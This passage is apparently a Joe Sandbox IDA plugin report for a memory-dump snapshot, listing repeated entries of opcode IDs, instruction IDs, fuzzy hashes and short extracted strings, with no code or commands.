                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: _K_H$K_I
                                                                                                                                                              • API String ID: 0-1586189426
                                                                                                                                                              • Opcode ID: 8ae3b671ca71721d7b350fb667679edc0f6f4947019813eea716116b82b7bbbe
                                                                                                                                                              • Instruction ID: f72d694087ff64ac2897fb098ae0c3278801c1a61c91f3fcf96607a4410e43fd
                                                                                                                                                              • Opcode Fuzzy Hash: 8ae3b671ca71721d7b350fb667679edc0f6f4947019813eea716116b82b7bbbe
                                                                                                                                                              • Instruction Fuzzy Hash: 66A29062B0E7694FE329A77CB8A55F57B90EF45324B0442FBC089CB0E7ED18A54687C1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: afe4f20fcbc2343bf7d5b1dd1b64de95ac7ac915c7b2bdf627b53aa23f799011
                                                                                                                                                              • Instruction ID: 0a1d2a0474ff731ce96848fbe4d29cd80f0832b30137a98b197dd8f259870de6
                                                                                                                                                              • Opcode Fuzzy Hash: afe4f20fcbc2343bf7d5b1dd1b64de95ac7ac915c7b2bdf627b53aa23f799011
                                                                                                                                                              • Instruction Fuzzy Hash: 82B2693072DA5E4BE32DCB6884A15B473A1EF49705B6546BDC4DBC34A7EE24B9438BC0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: a3de96e5ca2d10e68f2674c755cedad3dacd1605c51e7e44e4253caed0b95079
                                                                                                                                                              • Instruction ID: 4250e7b0ab396918194947340efe886414e5c677c6f53031ff3e44101329744c
                                                                                                                                                              • Opcode Fuzzy Hash: a3de96e5ca2d10e68f2674c755cedad3dacd1605c51e7e44e4253caed0b95079
                                                                                                                                                              • Instruction Fuzzy Hash: 9092F480A0EAC96FD75B97782876AE9BFB0DF16200F1C06EED0E99B1E7DC495516C301
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 0a0dcef05a786e2d4393e0a9de6a457042cd52a83285a47dad48f529678675f4
                                                                                                                                                              • Instruction ID: 99ae9c52cfc7e23052cba8b96b8f2a0987145b29c72375145babf82200754322
                                                                                                                                                              • Opcode Fuzzy Hash: 0a0dcef05a786e2d4393e0a9de6a457042cd52a83285a47dad48f529678675f4
                                                                                                                                                              • Instruction Fuzzy Hash: 37629220B1980D4FE7A8EB7C9465A79B7D2EF9D311B5201B9E05EC72F2DE28ED418740
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 2a449fb32b3ec5b4a2f8623a9ccc6d539538bc83304aeee49ceef74d06413b12
                                                                                                                                                              • Instruction ID: 1b5a11606fbaedde9210b621237d079ce64f8743e2aaf023718fed6c2c83c0a1
                                                                                                                                                              • Opcode Fuzzy Hash: 2a449fb32b3ec5b4a2f8623a9ccc6d539538bc83304aeee49ceef74d06413b12
                                                                                                                                                              • Instruction Fuzzy Hash: 1F328D30A0DA8D4FDB55DF7888656E97BE0FF59310F0801BDD4ADC71A6CA39A906CB41
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: db581322de9f0a355ad3346d62fc4338b12f20d38c4bfe209a7426dd7244e3f1
                                                                                                                                                              • Instruction ID: dbdf3057caa913d4637b39463df8152df7a759cf3ec652ec72803f84f0089c03
                                                                                                                                                              • Opcode Fuzzy Hash: db581322de9f0a355ad3346d62fc4338b12f20d38c4bfe209a7426dd7244e3f1
                                                                                                                                                              • Instruction Fuzzy Hash: A8F1A530A09A4E8FEBA8DF28C8557E977E1FF58310F04426AE85DC7295DF34A9458781
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: cee58b64f883fb703ad1f464001886c92d096106b2af73200c6c0facb49034a1
                                                                                                                                                              • Instruction ID: 7567d51143cb53cbe84a929097e34c33ef69a09312f100b1851221ff8408ae32
                                                                                                                                                              • Opcode Fuzzy Hash: cee58b64f883fb703ad1f464001886c92d096106b2af73200c6c0facb49034a1
                                                                                                                                                              • Instruction Fuzzy Hash: 03E1C430A09A4E8FEBA8DF28C8557E977E1FF58310F14426ED85DC7295DE34A9418781
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 7b405409dcb163dfa2f40265c1cce10f265d291571171bf8cfa51d69998d50fa
                                                                                                                                                              • Instruction ID: a8e97f4e7775641877d6f4ba3e985ac6b9aff04b6e99021ad138eb3c1aa47527
                                                                                                                                                              • Opcode Fuzzy Hash: 7b405409dcb163dfa2f40265c1cce10f265d291571171bf8cfa51d69998d50fa
                                                                                                                                                              • Instruction Fuzzy Hash: AAC14C20D9D65F0AE33AABF488A49B57650FF11319F694AB8C1EB83497F81CA15343A4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 072397f2564938d5316a61186b193111e705a4dc4f139f0bd4efac4131997bbb
                                                                                                                                                              • Instruction ID: fa2921afb6bbd483c3119ae8585777105d8fba098491050cc22e3dde4d848c2b
                                                                                                                                                              • Opcode Fuzzy Hash: 072397f2564938d5316a61186b193111e705a4dc4f139f0bd4efac4131997bbb
                                                                                                                                                              • Instruction Fuzzy Hash: 1BB15830A1E6990FE36E8B3888655757FE5EF86300B1501FFC0DAC71A7D828A943C791
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 7a6aa10fdbe135b7249c21e954ab47857e7997fd83578a29c160fdbe69903888
                                                                                                                                                              • Instruction ID: c23ebc81fc9d04e6c4bd58a0d69c4e73931b41f9b83b6c852a1d328d857565ac
                                                                                                                                                              • Opcode Fuzzy Hash: 7a6aa10fdbe135b7249c21e954ab47857e7997fd83578a29c160fdbe69903888
                                                                                                                                                              • Instruction Fuzzy Hash: 1AA11620D9D35F0EE33AABF488A49B57650FF01318F5A4A78C5EB83497F91CA16343A4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 3*$k+$s+
                                                                                                                                                              • API String ID: 0-4196702398
                                                                                                                                                              • Opcode ID: 165b3d42a1fb9d2f59c382ab8b602571f05585e71a8431536ab352f7a60d1f81
                                                                                                                                                              • Instruction ID: 3970389c2acc677d8b20d1a57d1057bf76d5e8dddb648316fdecbf1bbc9510f5
                                                                                                                                                              • Opcode Fuzzy Hash: 165b3d42a1fb9d2f59c382ab8b602571f05585e71a8431536ab352f7a60d1f81
                                                                                                                                                              • Instruction Fuzzy Hash: A1D12531B1EE4E4FEBA8976884693B573D1FF59310F15057DD04EC22E2EE28B9428791
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: R_H$[D
                                                                                                                                                              • API String ID: 0-3342419465
                                                                                                                                                              • Opcode ID: 9604cd495cbe8ad29a081bc0f346ee62a51214b17cdc5461bf9f321883b24a7a
                                                                                                                                                              • Instruction ID: 185dba460ab442b28d366467fa5fa50c7ac9e1a9e279d9058c37046d3aefb21f
                                                                                                                                                              • Opcode Fuzzy Hash: 9604cd495cbe8ad29a081bc0f346ee62a51214b17cdc5461bf9f321883b24a7a
                                                                                                                                                              • Instruction Fuzzy Hash: 7D229F30B2994D4FD7A8EB6CC465A7973D2FF99310F0141B9E19EC72A2DE28ED028751
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: +Q$;>
                                                                                                                                                              • API String ID: 0-2078235586
                                                                                                                                                              • Opcode ID: 759963739536ffe41de769be54f6b80c62553ebf7d23c4d7a8e11901887f7bea
                                                                                                                                                              • Instruction ID: f7328067e64612899ecbf3b8bc9feacec8f37e5670c089f6ec808bc68c221975
                                                                                                                                                              • Opcode Fuzzy Hash: 759963739536ffe41de769be54f6b80c62553ebf7d23c4d7a8e11901887f7bea
                                                                                                                                                              • Instruction Fuzzy Hash: 19C1D960A1EA891FF755BBB8487B9BE7FE1DF99204B4804BDD0D9C31A7DC1DA5028342
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: +Q$;>
                                                                                                                                                              • API String ID: 0-2078235586
                                                                                                                                                              • Opcode ID: 99e4b27662c74db689437fdfe0da1dc05b582d76c8904cabff97798597ce62f8
                                                                                                                                                              • Instruction ID: ca928e6fba1337811e18883baa3e980b0c415027cfb78693a6cf2bdfd5b1be18
                                                                                                                                                              • Opcode Fuzzy Hash: 99e4b27662c74db689437fdfe0da1dc05b582d76c8904cabff97798597ce62f8
                                                                                                                                                              • Instruction Fuzzy Hash: ECB1EB60A1EA891FF755BBB8487B9BEBFE1DF99204B4804BDD0D9C31A7DC1D95028342
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: I$jM_^
                                                                                                                                                              • API String ID: 0-821905247
                                                                                                                                                              • Opcode ID: 349fb6c14b36d15c5975c9c9b341e49c274c08fa0e73d8f4b89dbde41c416ee1
                                                                                                                                                              • Instruction ID: 516d3553da01267ed2d4a3f6a7a04242b2a2910c9eb2b0fdc4ebc97b97d59559
                                                                                                                                                              • Opcode Fuzzy Hash: 349fb6c14b36d15c5975c9c9b341e49c274c08fa0e73d8f4b89dbde41c416ee1
                                                                                                                                                              • Instruction Fuzzy Hash: 78610B53B0F6EA5FEB2A67A86C354E57F60EF4666470942F7D0D84B0E3EC0829078384
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 3*$k+
                                                                                                                                                              • API String ID: 0-3985132594
                                                                                                                                                              • Opcode ID: b45e5c3bd8011d1a9f7706a109d0f8a4dd94a232e393a645affc568c4995cf05
                                                                                                                                                              • Instruction ID: fd198f220623ef66026d0ceeaeca37bab23e7a91f14b14535f2b42ba480e85b3
                                                                                                                                                              • Opcode Fuzzy Hash: b45e5c3bd8011d1a9f7706a109d0f8a4dd94a232e393a645affc568c4995cf05
                                                                                                                                                              • Instruction Fuzzy Hash: 4941B170B29E0A4FE758EB28C4663B5B7E1FB99201F40453ED04EC36A2DF35B5528B81
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: [D
                                                                                                                                                              • API String ID: 0-3436156298
                                                                                                                                                              • Opcode ID: 873acd300145ed7c029a2f24c03601714a8e6ce6226f969fa967a904e5c0f1fa
                                                                                                                                                              • Instruction ID: b6dd3c4f62195c3ac6a90e86a44ef4b00a066b5b420e0958b7b6a7888268ec65
                                                                                                                                                              • Opcode Fuzzy Hash: 873acd300145ed7c029a2f24c03601714a8e6ce6226f969fa967a904e5c0f1fa
                                                                                                                                                              • Instruction Fuzzy Hash: DFD19030B2990D5FDBA8EB6CC465A7973D2FF99300F414079E49EC72A2DE24ED028751
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: `$x
                                                                                                                                                              • API String ID: 0-413141658
                                                                                                                                                              • Opcode ID: b02c51b0e9b73d404b3d82a2f677b1ff56aa5b44c1a83f702550db7853da80bc
                                                                                                                                                              • Instruction ID: fda2752e7733fd18a5be2e4d99c07d9d027f742a3e5afc15ad2425af5197893e
                                                                                                                                                              • Opcode Fuzzy Hash: b02c51b0e9b73d404b3d82a2f677b1ff56aa5b44c1a83f702550db7853da80bc
                                                                                                                                                              • Instruction Fuzzy Hash: D7B1C230A19A4D8FDB88EF68C4646BE7BF1FF98310F5401ADD419D72E6CA39A902C741
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: H
                                                                                                                                                              • API String ID: 0-2852464175
                                                                                                                                                              • Opcode ID: 7e2e88170d7aaac73b6f92ecd3e33294b9fd224f264b0ffcb9e483ecc5c98fd0
                                                                                                                                                              • Instruction ID: 47a6b36f36ea0d8871d1430dd7f244ab76e4a386d70ae91e8fd0da4595d3fe85
                                                                                                                                                              • Opcode Fuzzy Hash: 7e2e88170d7aaac73b6f92ecd3e33294b9fd224f264b0ffcb9e483ecc5c98fd0
                                                                                                                                                              • Instruction Fuzzy Hash: E9818020B2994D4FE798EB6C8469B39B7D2EF9D311B060178E15EC72E2DE28ED418740
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 4O_H
                                                                                                                                                              • API String ID: 0-1626337838
                                                                                                                                                              • Opcode ID: 8b9a5f6061f55f1c5dbd01ae6bb7ed76f80874f8c4b8d730e8b8f0f3619a0f2d
                                                                                                                                                              • Instruction ID: 233369ab11ca087da83ee2b57a1c72f1bf6cee9ceb37ed9f8bfa8f109211fb0a
                                                                                                                                                              • Opcode Fuzzy Hash: 8b9a5f6061f55f1c5dbd01ae6bb7ed76f80874f8c4b8d730e8b8f0f3619a0f2d
                                                                                                                                                              • Instruction Fuzzy Hash: 95A1DEB290EAC59FD34BCB7868B9965BFF09F2321471C44EEC1DA8B1B3E55A4416C702
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: x
                                                                                                                                                              • API String ID: 0-2363233923
                                                                                                                                                              • Opcode ID: ed41c72438815ef62ac6eef160e298f925aa4f9721e6a22b861c6e7d80e8e2de
                                                                                                                                                              • Instruction ID: 569fd03eda8fe9beecbd9afca212629ec41a3e6c3edd9803634a085e2c633aaf
                                                                                                                                                              • Opcode Fuzzy Hash: ed41c72438815ef62ac6eef160e298f925aa4f9721e6a22b861c6e7d80e8e2de
                                                                                                                                                              • Instruction Fuzzy Hash: 7D616C30A0E64D4FD765DBA8C4A59E9BBB1FF49310F1541FAD048C71E7DB28A886C750
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: I
                                                                                                                                                              • API String ID: 0-3707901625
                                                                                                                                                              • Opcode ID: ccf8aaf6df8811beade4c9650faeaaea7c14a49332ac0fb846087109e1b79468
                                                                                                                                                              • Instruction ID: 67bac25927c28307f764c3712298c601e52e2d98a2657eac06d0c92e6beb83ed
                                                                                                                                                              • Opcode Fuzzy Hash: ccf8aaf6df8811beade4c9650faeaaea7c14a49332ac0fb846087109e1b79468
                                                                                                                                                              • Instruction Fuzzy Hash: 63510953B0F6DA5FEB2657A86C754E57FA0EF4675470942F7C0D88B0F3E90929068388
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: I
                                                                                                                                                              • API String ID: 0-3707901625
                                                                                                                                                              • Opcode ID: f52591436248ff5aae217b45dc38ec58373f9b8734740d61c38db762cd6fee14
                                                                                                                                                              • Instruction ID: 4b1d512f631d688015474a083f0e1c528aa826e5012c505e8324eacfcacae429
                                                                                                                                                              • Opcode Fuzzy Hash: f52591436248ff5aae217b45dc38ec58373f9b8734740d61c38db762cd6fee14
                                                                                                                                                              • Instruction Fuzzy Hash: 2B310443B0F6E98FDB2A67AC3C250E57F50DF4636470942FBD09C8B0E7E80929068395
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: I
                                                                                                                                                              • API String ID: 0-3707901625
                                                                                                                                                              • Opcode ID: e7723af2694eb9e32b8a88be95612d2eed389cf6fc39bb0e8e2962095f16ef80
                                                                                                                                                              • Instruction ID: 6cd2b56f8409d038ab4f720fa7acfbbe8087c6f7a51a96b8b18893f3e2f5ae6c
                                                                                                                                                              • Opcode Fuzzy Hash: e7723af2694eb9e32b8a88be95612d2eed389cf6fc39bb0e8e2962095f16ef80
                                                                                                                                                              • Instruction Fuzzy Hash: B9310443B0F6E98FEB2A67AC3C250E56F50DF4636470942FBD09C8B0E7EC4929069395
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: I
                                                                                                                                                              • API String ID: 0-3707901625
                                                                                                                                                              • Opcode ID: c1b86e959fa523fb72a332a9bb339289acd8f7afc38ca5ffd01bc8469d51a250
                                                                                                                                                              • Instruction ID: 6e0f032c60a66f04b724fdf2a98026f0b51f653f4db8e3938a407424b2a9449e
                                                                                                                                                              • Opcode Fuzzy Hash: c1b86e959fa523fb72a332a9bb339289acd8f7afc38ca5ffd01bc8469d51a250
                                                                                                                                                              • Instruction Fuzzy Hash: B931C553B0F7D99FEB2A97AC6C250A57F60EF4635074942FBC0D88B0F7E90969068384
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: I
                                                                                                                                                              • API String ID: 0-3707901625
                                                                                                                                                              • Opcode ID: 7ca6b08b5be9c809e01855d4be6b074969eb9c135e2571637b524e5a21ef4b4d
                                                                                                                                                              • Instruction ID: 3869889fb00f5fcc2bceed10f0ea9ee46bf4c24fd79bba9fd05751c35e7dd1bb
                                                                                                                                                              • Opcode Fuzzy Hash: 7ca6b08b5be9c809e01855d4be6b074969eb9c135e2571637b524e5a21ef4b4d
                                                                                                                                                              • Instruction Fuzzy Hash: 7E21F953B0F7C99FEB2657A86C250A57F60EF4635074942FBD0D88B0F7E80969068384
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: x#x
                                                                                                                                                              • API String ID: 0-1171549845
                                                                                                                                                              • Opcode ID: ba54fa46aa99e78667eb938e4f1767c96ffd9364408bd4026ddec1b631f8cc93
                                                                                                                                                              • Instruction ID: 5b29f21b3852b98571a355bb2e90d0481d2d1cf912ea5457d6bb81d18191c477
                                                                                                                                                              • Opcode Fuzzy Hash: ba54fa46aa99e78667eb938e4f1767c96ffd9364408bd4026ddec1b631f8cc93
                                                                                                                                                              • Instruction Fuzzy Hash: 5831A430B1994E8FDB98EF1884646BA77E1FF99311F544179D419D32AACE38A902C741
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: H
                                                                                                                                                              • API String ID: 0-2852464175
                                                                                                                                                              • Opcode ID: 4a5892626cf5b997b30c41d70595150247b36605bc9a58631be832cb00ceaba3
                                                                                                                                                              • Instruction ID: 5afdd66bfe11d9e355f75c1a0605502acb4fab2c6a869531f838bd98ca26be63
                                                                                                                                                              • Opcode Fuzzy Hash: 4a5892626cf5b997b30c41d70595150247b36605bc9a58631be832cb00ceaba3
                                                                                                                                                              • Instruction Fuzzy Hash: 9531F761F0DA898FE799FB785869A787BD1EF95304B4804FED059C71E7ED29AC028301
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: I
                                                                                                                                                              • API String ID: 0-3707901625
                                                                                                                                                              • Opcode ID: 8106a8a284aa6b9fca6894c724fc2f83f37f8b4d161bf40fdb29c311d014f0ff
